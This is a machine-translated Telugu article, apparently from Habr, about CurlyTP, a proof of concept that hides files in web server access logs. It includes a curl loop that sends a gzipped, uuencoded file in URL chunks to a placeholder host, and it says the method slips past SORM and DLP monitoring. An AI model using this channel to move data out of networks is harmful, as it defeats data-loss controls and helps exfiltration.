సర్వర్ లాగ్‌ల ద్వారా రహస్య సందేశాల మార్పిడి

వికీపీడియా నిర్వచనం ప్రకారం, డెడ్ డ్రాప్ అనేది రహస్య ప్రదేశాన్ని ఉపయోగించే వ్యక్తుల మధ్య సమాచారాన్ని లేదా కొన్ని వస్తువులను మార్పిడి చేయడానికి ఉపయోగపడే కుట్ర సాధనం. ప్రజలు ఎప్పుడూ కలవకూడదనే ఆలోచన ఉంది - కానీ వారు ఇప్పటికీ కార్యాచరణ భద్రతను నిర్వహించడానికి సమాచారాన్ని మార్పిడి చేసుకుంటారు.

దాక్కున్న ప్రదేశం దృష్టిని ఆకర్షించకూడదు. అందువల్ల, ఆఫ్‌లైన్ ప్రపంచంలో వారు తరచుగా వివేకం గల వస్తువులను ఉపయోగిస్తారు: గోడలో వదులుగా ఉండే ఇటుక, లైబ్రరీ పుస్తకం లేదా చెట్టులోని బోలు.

ఇంటర్నెట్‌లో చాలా ఎన్‌క్రిప్షన్ మరియు అనామకీకరణ సాధనాలు ఉన్నాయి, అయితే ఈ సాధనాలను ఉపయోగించడం చాలా వాస్తవం దృష్టిని ఆకర్షిస్తుంది. అదనంగా, వారు కార్పొరేట్ లేదా ప్రభుత్వ స్థాయిలో నిరోధించబడవచ్చు. ఏం చేయాలి?

డెవలపర్ ర్యాన్ ఫ్లవర్స్ ఒక ఆసక్తికరమైన ఎంపికను ప్రతిపాదించారు - ఏదైనా వెబ్ సర్వర్‌ను దాచే ప్రదేశంగా ఉపయోగించండి. మీరు దాని గురించి ఆలోచిస్తే, వెబ్ సర్వర్ ఏమి చేస్తుంది? అభ్యర్థనలను స్వీకరిస్తుంది, ఫైల్‌లను జారీ చేస్తుంది మరియు లాగ్‌లను వ్రాస్తుంది. మరియు ఇది అన్ని అభ్యర్థనలను లాగ్ చేస్తుంది, సరికానివి కూడా!

ఏదైనా వెబ్ సర్వర్ లాగ్‌లో దాదాపు ఏదైనా సందేశాన్ని సేవ్ చేయడానికి మిమ్మల్ని అనుమతిస్తుంది. దీన్ని ఎలా ఉపయోగించాలా అని పువ్వులు ఆలోచించాయి.

అతను ఈ ఎంపికను అందిస్తాడు:

  1. టెక్స్ట్ ఫైల్ (రహస్య సందేశం) తీసుకుని, హాష్ (md5sum)ని లెక్కించండి.
  2. మేము దానిని ఎన్కోడ్ చేస్తాము (gzip+uuencode).
  3. మేము సర్వర్‌కు ఉద్దేశపూర్వకంగా తప్పు అభ్యర్థనను ఉపయోగించి లాగ్‌కు వ్రాస్తాము.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

ఫైల్‌ను చదవడానికి, మీరు ఈ కార్యకలాపాలను రివర్స్ ఆర్డర్‌లో నిర్వహించాలి: ఫైల్‌ను డీకోడ్ చేసి అన్జిప్ చేయండి, హాష్‌ను తనిఖీ చేయండి (హాష్ ఓపెన్ ఛానెల్‌ల ద్వారా సురక్షితంగా ప్రసారం చేయబడుతుంది).

ఖాళీలు భర్తీ చేయబడతాయి =+=తద్వారా చిరునామాలో ఖాళీలు ఉండవు. రచయిత CurlyTP అని పిలిచే ప్రోగ్రామ్, ఇమెయిల్ జోడింపుల వంటి బేస్64 ఎన్‌కోడింగ్‌ని ఉపయోగిస్తుంది. అభ్యర్థన కీవర్డ్‌తో చేయబడుతుంది ?transfer?తద్వారా గ్రహీత దానిని లాగ్‌లలో సులభంగా కనుగొనవచ్చు.

ఈ సందర్భంలో లాగ్‌లలో మనం ఏమి చూస్తాము?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

ఇప్పటికే చెప్పినట్లుగా, రహస్య సందేశాన్ని స్వీకరించడానికి మీరు రివర్స్ క్రమంలో కార్యకలాపాలను నిర్వహించాలి:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

ప్రక్రియ స్వయంచాలకంగా సులభం. Md5sum సరిపోలుతుంది మరియు ఫైల్ యొక్క కంటెంట్‌లు ప్రతిదీ సరిగ్గా డీకోడ్ చేయబడిందని నిర్ధారిస్తాయి.

పద్ధతి చాలా సులభం. “ఈ వ్యాయామం యొక్క ఉద్దేశ్యం అమాయక చిన్న వెబ్ అభ్యర్థనల ద్వారా ఫైల్‌లను బదిలీ చేయవచ్చని నిరూపించడం మరియు ఇది సాదా వచన లాగ్‌లతో ఏదైనా వెబ్ సర్వర్‌లో పని చేస్తుంది. ముఖ్యంగా, ప్రతి వెబ్ సర్వర్ ఒక దాక్కున్న ప్రదేశం!" అని ఫ్లవర్స్ రాశారు.

వాస్తవానికి, గ్రహీత సర్వర్ లాగ్‌లకు ప్రాప్యత కలిగి ఉంటే మాత్రమే పద్ధతి పని చేస్తుంది. కానీ అలాంటి యాక్సెస్ అందించబడుతుంది, ఉదాహరణకు, చాలా మంది హోస్టర్లు.

దీన్ని ఎలా వాడాలి?

ర్యాన్ ఫ్లవర్స్ అతను సమాచార భద్రతా నిపుణుడు కాదని మరియు CurlyTP కోసం సాధ్యమయ్యే ఉపయోగాల జాబితాను కంపైల్ చేయనని చెప్పారు. అతనికి, మనం ప్రతిరోజూ చూసే సుపరిచితమైన సాధనాలను అసాధారణ రీతిలో ఉపయోగించవచ్చనే భావనకు ఇది ఒక రుజువు మాత్రమే.

వాస్తవానికి, ఈ పద్ధతి ఇతర సర్వర్ "దాచడం" వంటి వాటి కంటే అనేక ప్రయోజనాలను కలిగి ఉంది డిజిటల్ డెడ్ డ్రాప్ లేదా పైరేట్ బాక్స్: దీనికి సర్వర్ వైపు ప్రత్యేక కాన్ఫిగరేషన్ లేదా ఏదైనా ప్రత్యేక ప్రోటోకాల్‌లు అవసరం లేదు - మరియు ట్రాఫిక్‌ను పర్యవేక్షించే వారిలో అనుమానాన్ని రేకెత్తించదు. SORM లేదా DLP సిస్టమ్ కంప్రెస్డ్ టెక్స్ట్ ఫైల్‌ల కోసం URLలను స్కాన్ చేసే అవకాశం లేదు.

సర్వీస్ ఫైల్స్ ద్వారా సందేశాలను ప్రసారం చేసే మార్గాలలో ఇది ఒకటి. కొన్ని అధునాతన కంపెనీలు ఎలా ఉంచాలో మీరు గుర్తుంచుకోగలరు HTTP హెడర్‌లలో డెవలపర్ ఉద్యోగాలు లేదా HTML పేజీల కోడ్‌లో.

సర్వర్ లాగ్‌ల ద్వారా రహస్య సందేశాల మార్పిడి

ఒక సాధారణ వ్యక్తి హెడర్‌లు లేదా HTML కోడ్‌ని చూడరు కాబట్టి వెబ్ డెవలపర్‌లు మాత్రమే ఈ ఈస్టర్ ఎగ్‌ని చూస్తారనే ఆలోచన ఉంది.

సర్వర్ లాగ్‌ల ద్వారా రహస్య సందేశాల మార్పిడి

మూలం: www.habr.com

ఒక వ్యాఖ్యను జోడించండి